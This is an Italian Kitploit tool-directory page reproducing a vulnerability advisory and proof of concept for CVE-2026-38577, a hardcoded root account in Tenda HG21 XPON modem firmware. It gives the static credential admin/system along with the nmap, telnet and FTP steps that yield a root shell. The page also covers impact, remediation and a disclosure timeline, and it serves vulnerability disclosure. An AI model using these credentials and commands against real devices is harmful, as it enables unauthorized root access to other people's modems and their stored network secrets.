Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-38577-by-deepak-Anmol — Proof-of-concept che dimostra credenziali root hardcoded (admin/system) nel firmware del modem XPON Tenda HG21, consentendo accesso root non autorizzato tramite telnet e FTP. | Kitploit
Strumenti/GitHubGitHub/poxsky/cve-2026-38577-by-deepak-anmol
Sicurezza Sistemi EmbeddedSicurezza IoTAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza Hardware e IoTAnalisi del Firmware
GitHubpoxsky/cve-2026-38577-by-deepak-anmol

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-38577-by-deepak-Anmol

Proof-of-concept che dimostra credenziali root hardcoded (admin/system) nel firmware del modem XPON Tenda HG21, consentendo accesso root non autorizzato tramite telnet e FTP.

Vedi Repository
9h 26m faNon ancora revisionato

CVE-2026-38577 — Credenziali Root Hardcoded Tenda HG21

Riepilogo

CampoValore
ID CVECVE-2026-38577
VendorTenda
ProdottoTenda HG21 (Modem Fiber XPON)
Versione AffettaV4.0.0-260302
Product KeyHG21-V1.0-TDE01
Versione HardwareV1.0
Data Build Firmware2026-03-02
File FirmwareUS_HG21re_300002982_en_xpon_2.zip
Classe di VulnerabilitàCWE-798: Uso di Credenziali Hardcoded
ScopritoreAnmol Singh Rajput — Ricercatore di Sicurezza Indipendente
Stato della DivulgazioneVendor non ancora informato al momento della riserva CVE — si applica una finestra di divulgazione responsabile di 90 giorni dalla data di assegnazione del CVE

Descrizione

L'analisi del firmware del modem fiber XPON Tenda HG21 ha rivelato un account amministrativo hardcoded integrato nell'immagine firmware fornita. All'account vengono concessi pieni privilegi di root (UID 0) e le sue credenziali sono statiche su tutti i dispositivi, il che significa che qualsiasi attaccante in grado di raggiungere un servizio di gestione esposto su un'unità vulnerabile può autenticarsi come root senza dover conoscere la password dell'interfaccia web impostata dal cliente.

Dove è stato trovato

  • /etc/passwd nel firmware estratto include una voce admin con un hash della password SHA256crypt che corrisponde al valore statico system.
  • L'UID dell'account è 0 — cioè è root, non un account di servizio limitato.
  • Non è presente alcun /etc/shadow, quindi l'hash debole/statico in passwd è l'unica barriera che protegge l'account.
  • /etc/inetd.conf avvia telnetd e ftpd, entrambi eseguiti come root, quindi l'account hardcoded è raggiungibile tramite rete, non solo su una console seriale/UART.
  • L'interfaccia di gestione web è servita solo su HTTP semplice (senza TLS), che rappresenta un ulteriore gap di hardening ma non è di per sé il CVE.

Impatto

Un attaccante con accesso di rete ai servizi telnet (TCP/23) o FTP (TCP/21) di un dispositivo vulnerabile può accedere come admin utilizzando la password statica e ottenere una shell root / accesso ai file a livello root. Ciò consente, come minimo:

  • Esecuzione di codice — shell root tramite telnet.
  • Escalation dei privilegi — non esiste alcun confine di privilegio; l'account parte già come root.
  • Divulgazione di informazioni — accesso completo a filesystem/config, incluse eventuali credenziali di rete del cliente memorizzate sul dispositivo.

Vettori CVSS dalla segnalazione originale (il punteggio del vendor potrebbe differire una volta pubblicato):

  • Vettore di Attacco: Rete
  • Privilegi Richiesti: Nessuno (le credenziali sono hardcoded/note)
  • Interazione Utente: Nessuna
  • Riservatezza / Integrità / Disponibilità: Alta / Alta / Alta

Proof of Concept

Questo è un PoC basato su credenziali — dimostra che l'account hardcoded autentica e concede root, non uno sfruttamento di corruzione della memoria. Eseguilo solo contro un dispositivo di tua proprietà o per il quale sei esplicitamente autorizzato a testare.

1. Conferma che la credenziale esista nel firmware

root@kitploit:~
# Estrai il firmware (binwalk o lo strumento del vendor che preferisci)
binwalk -e US_HG21re_300002982_en_xpon_2.bin

# Individua e ispeziona il file passwd
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-hash-di-"system">:0:0:root:/root:/bin/sh

2. Conferma che il servizio sia raggiungibile

root@kitploit:~
nmap -p 21,23 <ip-target>

3. Autenticati con l'account hardcoded

root@kitploit:~
telnet <ip-target>
# login: admin
# password: system
root@kitploit:~
ftp <ip-target>
# Nome: admin
# Password: system

Un accesso riuscito su entrambi i servizi restituisce una shell/sessione FTP con privilegi root (id riporterà uid=0(root)).

Rimedio

  • Il vendor dovrebbe rimuovere completamente l'account hardcoded admin/system, o come minimo imporre una password casuale unica per dispositivo impostata al primo avvio (non derivabile dal solo numero di serie).
  • Disabilitare telnetd/ftpd per impostazione predefinita; richiedere un'adesione esplicita e un canale autenticato e crittografato (SSH/SFTP) per l'amministrazione remota.
  • Servire l'interfaccia di gestione solo su HTTPS.
  • Ruotare la credenziale statica in qualsiasi unità già distribuita tramite un aggiornamento firmware obbligatorio e forzare un reset della password all'aggiornamento.

Cronologia

DataEvento
2026-03-02Rilascio del build firmware vulnerabile
—Scoperta durante un'analisi firmware indipendente
2026-04-09CVE-2026-38577 riservato tramite MITRE
—Notifica al vendor in sospeso (finestra di divulgazione di 90 giorni dall'assegnazione del CVE)

Crediti

Scoperto e segnalato da:

  • Anmol Singh Rajput — LinkedIn
  • Deepak G — LinkedIn

Riferimenti

  • https://www.tenda.com.cn
  • https://cwe.mitre.org/data/definitions/798.html
Scarica lo strumento